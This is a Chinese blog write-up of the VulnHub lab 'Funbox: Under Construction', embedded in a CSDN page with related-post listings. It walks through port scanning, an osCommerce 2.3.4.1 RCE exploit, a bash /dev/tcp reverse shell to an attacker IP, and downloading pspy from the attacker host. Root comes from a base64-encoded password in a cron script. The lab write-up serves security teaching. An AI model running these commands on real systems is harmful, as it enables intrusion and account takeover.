vulnhub Funbox: Under Construction

最新推荐文章于 2023-06-08 22:11:15 发布
最新推荐文章于 2023-06-08 22:11:15 发布
阅读量551 收藏
点赞数 2
分类专栏: vulnhub 文章标签: 安全 osCommerce pspy rce
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/125022744
版权

渗透思路:

nmap扫描端口----dirb扫描网站目录----利用osCommerce v2.3.4.1的rce漏洞getshell----pspy64s发现定时任务----信息泄漏获得root密码----su输入密码提权

环境信息:

靶机:192.168.101.72

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.72

扫描到22(ssh)、80(http)、25、110、143(这三个都和邮件有关)

2、dirb扫描网站目录

dirb http://192.168.101.72

扫描到一个有意思的http://192.168.101.72/catalog/

3、利用osCommerce v2.3.4.1的rce漏洞getshell

浏览器访问http://192.168.101.72/catalog/,发现一个网站安装页面,并且从这个页面可以知道,这个站点使用了osCommerce v2.3.4.1

使用searchsploit查找osCommerce

searchsploit osCommerce

找到一堆版本相符的exp,我选了下图最下面这行RCE的exp,50128.py

找到这个exp的绝对路径

searchsploit -p php/webapps/50128.py

将exp拷贝到当前文件夹

cp /usr/share/exploitdb/exploits/php/webapps/50128.py ./50128.py

执行exp

​python3 50128.py http://192.168.101.72/catalog

给出成功提示后,在攻击机上另起一个shell监听8888端口

nc -nlvp 8888

在exp执行成功的RCE_SHELL中输入

bash -c "exec bash -i &>/dev/tcp/192.168.101.34/8888 <&1"

注意,由于漏洞上下文的原因,payload中不能使用单引号,可以使用双引号,或者如果非要使用单引号,则要对单引号转义

获得靶机www-data用户的反弹shell

4、pspy64s发现定时任务

攻击机上pspy64s所在文件夹下起http服务

python2 -m SimpleHTTPServer 9999

靶机shell中首先进入/tmp目录,然后wget下载pspy64s,chmod修改pspy64s权限为可执行,然后执行pspy64s

cd /tmp
wget http://192.168.101.34:9999/pspy64s
chmod +x pspy64s
./pspy64s

pspy64s执行一会儿后,发现有一个一分钟执行一次的定时任务/bin/sh -c /usr/share/doc/examples/cron.sh

5、信息泄漏获得root密码,su提权

查看/usr/share/doc/examples/cron.sh的内容

cat /usr/share/doc/examples/cron.sh

发现其中有base64编码

# cron.sh sample file

# 0 20 * * * /bin/goahead --parameter: LXUgcm9vdCAtcCByZnZiZ3QhIQ==

用burp的decoder模块解码后,发现内容是:

-u root -p rfvbgt!!

尝试用su命令提权到root,提示must be run from a terminal

靶机shell下输入如下命令获得tty

python -c 'import pty; pty.spawn("/bin/bash")'

然后再su,密码为rfvbgt!!,得到root用户shell

在/root/root.txt中找到proof

仙女象
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java 远程调试_Java远程调试
weixin_32352621的博客
02-19 817
集群前后台协议需要做一些修改,我负责jdbc这边的修改。按照协议内容修改完代码之后却面临一个测试的问题:修改后的后台又部署在北京,但北京并不是所有的机器都对天津这边开放,只给提供一台机器A,就是集群的服务器。这样的话,就无法创建节点的连接,测试没有办法进行。一开始用了最简单的办法,把打好的jar包通过远程ssh放到A上面,再通过ssh去跑用例,打印结果看看正确与否。但是这样的效率真的太低了,每做一...
funbox:测试和工具程序
02-11
"funbox"是一个用于测试和工具程序的项目,主要基于C语言开发。在软件开发过程中,测试和工具程序起着至关重要的作用,它们能够帮助开发者有效地检查代码质量、定位问题以及提升开发效率。下面我们将详细探讨这个...
渗透测试--GROTESQUE: 2漏洞复现
qq_59589136的博客
06-08 145
4、编辑网卡配置文件vi /etc/network/interfaces,在vi命令模式下,是不能直接编辑文本的,输入的字母会被当做命令执行,按i,切换到插入模式,进行文本编辑,esc退出编辑模式。由于我的版本过低,原来是没有pspy64s这个工具包,需要下载安装到kali攻击机上,但是又显glibc版本过低,需要下载高一点的版本。命令:for i in {23..556};下载安装时又显示bison太旧,需要更新升级,发现是没有安装bison的,安装过程又需要连接到github安装工具,最后成功。
靶场练习第十九天~vulnhub靶场之GreenOptic: 1
qq_57976347的博客
02-18 784
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:GreenOptic: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -sV 192.168.101.123 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息
vulnhub靶场5:red
Genarior的专栏
05-04 139
17、赋权后,执行该工具,找到了后面文件,该源码文件会被定时编译,并执行,发现后面程序,在/var/www/wordpress/.git/目录下,该文件执行具有root权限。12、发现可以使用ippsec账户,执行/usr/bin/time命令,于是切换到ippsec用户,并反弹shell,在ippsec用户反馈的shell不会被定时清除。8、由于是php,所以读取配置文件,wp-config.php,得到如下信息,使用ssh登录,无法登录,由于前面提到hashcat,考虑通过碰撞进行爆破。
ssh: connect to host 192.168.101.34 port 22: Connection timed out
热门推荐
longcheng217的博客
04-01 1万+
背景: 使用 Cygwin64 登录虚拟机时发现无法远程登录虚拟机中Ubuntu系统(之前可以): $ ssh lc@192.168.101.34 ssh: connect to host 192.168.101.34 port 22: Connection timed out 解决步骤: 1. 查看是否开启了ssh服务 发现 ssh服务已经开启 2. 在PC端ping 虚拟机 C:\Use...
docker-funbox:具有有趣的终端命令和ASCII艺术的Docker容器
05-04
Docker Funbox 带有有趣怪异终端命令和ASCII艺术的容器。 特色 按字母顺序: 洛尔卡特 喵喵猫 管道 RIG-随机身份生成器 sl (不要与ls混淆) 洗手间 VLC S 基本用法 $ docker run --rm -it wernight/funbox _ ...
funbox_reactapp:测试
05-11
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。目录自动格式化代码更改页面<title>... 使用AJAX请求获取数据与API后端集成节点Ruby on Rails 在开发中...
funxbox-test:Funbox的测试任务
05-08
Funbox的测试任务 要启动它: npm安装 凉亭安装 吞咽 喝一口 gulp测试(用于测试) 通过在文本框中输入名称并按Enter,可以添加新的航点。 此后: 输入的路径点显示在已添加点列表的末尾; 标记会出现在地图...
中兴funbox固件b18版本
07-12
【中兴funbox固件b18版本】是一款专为中兴Funbox设备设计的系统升级包,基于Android 4.4操作系统。该固件旨在优化设备性能、增强稳定性、修复已知问题以及可能添加的新功能。对于用户来说,升级到这个版本可以提升...
Python-PSPy一个简单的Python27AWSLambda函数
08-10
PSPy 一个简单的Python 2.7 AWS Lambda函数,用于执行PowerShell binary和编组输入/输出到PowerShell
pspy:在没有root权限的情况下监视linux进程
03-31
pspy-无特权Linux进程监听 pspy是一种命令行工具,旨在无需根权限就可以窥探进程。 它允许您在其他用户执行命令时查看它们,cron作业等。 非常适合枚举CTF中Linux系统。 很好地向您的同事展示为什么在命令行中将秘密作为参数传递是一个坏主意。 该工具从procfs扫描中收集信息。 放置在文件系统选定部分上的Inotify观察程序将触发这些扫描,以捕获短暂的进程。 入门 下载 将工具安装到要检查Linux机器上。 首先获取二进制文件。 在此处下载发布的二进制文件: 32位大,静态版本: pspy32 64位大,静态版本: pspy64 32位小版本: pspy32s 64位小版本: pspy64s 静态编译的文件应可在任何Linux系统上使用,但容量很大(〜4MB)。 如果有大小问题,请尝试较小的版本,该版本取决于libc并使用UPX(〜1MB)压缩。 建造 您可以使用系
Vulnhub靶场】Red:1
Nailaoyyds的博客
06-14 1495
目录前期配置​记一次kali双网卡IP不显示问题环境介绍一、信息收集nmap扫描 寻找线索 后门文件爆破 参数爆破 文件包含利用 filter伪协议 远程连接 权限提升 会话维持pspy64s监听 反弹shell代码 前期配置 记一次kali双网卡IP不显示问题 添加网卡适配器配置网卡编辑器 开启网卡 网络配置中添加eth1网卡 重启网络服务,已经获取到IP 一、信息收集 nmap扫描 访问IP 确定靶机位置 点击search会跳转到一个域名 修改hosts解析使它正常访问wi
靶机渗透练习17-Red
hirak0的博客
04-16 1805
靶机描述 靶机地址:https://www.vulnhub.com/entry/napping-101,752/ Description Even Admins can fall asleep on the job This works better with VirtualBox rather than VMware ## Changelog v1.0.1 - 2021-10-30 v1.0.0 - 2021-10-22 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机:
vulnhub Funbox: 1
箭雨镜屋
07-09 961
渗透思路:nmap扫描----wpscan爆破网站用户名和密码----joe用户ssh登录并绕过rbash----文件权限777定时任务提权(多个用户定时任务执行同一个文件)
VulnHub-CewlKid
sanqin_的博客
11-20 308
靶机 DHCP 未能正确分配 IP :看这里 按照正常流程 nmap -sV ip 发现开放三个端口 22端口:ssh 80端口:浏览器打开是阿帕奇 8080端口:浏览器打开是网页 查看8080端口的网页,在 F12发现一串密文 尝试使用常用的解码方式解密无果后,先保存下来 发现有登入页面,在尝试常用万能密码无法登入后, 使用使用爬虫创建自字典的工具 cewl http://192.168.1.126:8080 > key.lst 然后bp抓取登入信息,使用字典爆破 点击爆破,找到密码,Le
vulnhub | BROKEN-2020: 1
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
09-07 444
文章目录总结前言开始 总结 - 0. arp 扫描 | netdiscover -i eth0 | arp-scan --interface=eth0 --localnet - 0.1 查看定时任务 | cat /etc/crontab - 1. python 开启一个http服务器 | python3 -m http.server 8080 - 2. nc 开启监听 | nc -lvp 4444 - 3. nc 反弹shell | nc -e /bin/bash 10.0.2.4 4444 -
靶机练习No.19 VulnHub靶机 Red-1目录扫出后门,wfuzz 枚举参数,filter协议读取数据库源码,hashcat解密 time提权 .c后门反弹shell
YouthBelief的博客
01-14 1982
0x00 环境准备 下载地址: https://www.vulnhub.com/entry/red-1,753/ virtual box 导入靶机 难度:中 靶机上架时间:2021年11月3日 提示:Red has taken over your system, are you able to regain control? 红色已经控制了你的系统,你能重新控制吗? 0x01 信息收集 靶机ip探测 端口服务识别 扫出开放 22和80端口, 80端口wordpress 5.8
FUNBOX: UNDER CONSTRUCTION!
最新发布
08-16
FUNBOX: UNDER CONSTRUCTION! 是一个面向初学者的基础级 BootToRoot 机器,难度较低。它有两个标志,可以在该链接下载:https://www.vulnhub.com/entry/funbox-under-construction,715/。通过主机发现工具netdiscover可以进行信息探测,命令如下:netdiscover -i eth0 -r 192.168.187.0/24。此外,在查看cron.sh文件时,可以进行base64解码,然后切换到root用户并获得flag。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [vulnhub刷题记录(FUNBOX: UNDER CONSTRUCTION!)](https://blog.csdn.net/admin_gt/article/details/126722192)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [vulnhub--Funbox: Under Construction!](https://blog.csdn.net/qq_39991837/article/details/119374087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值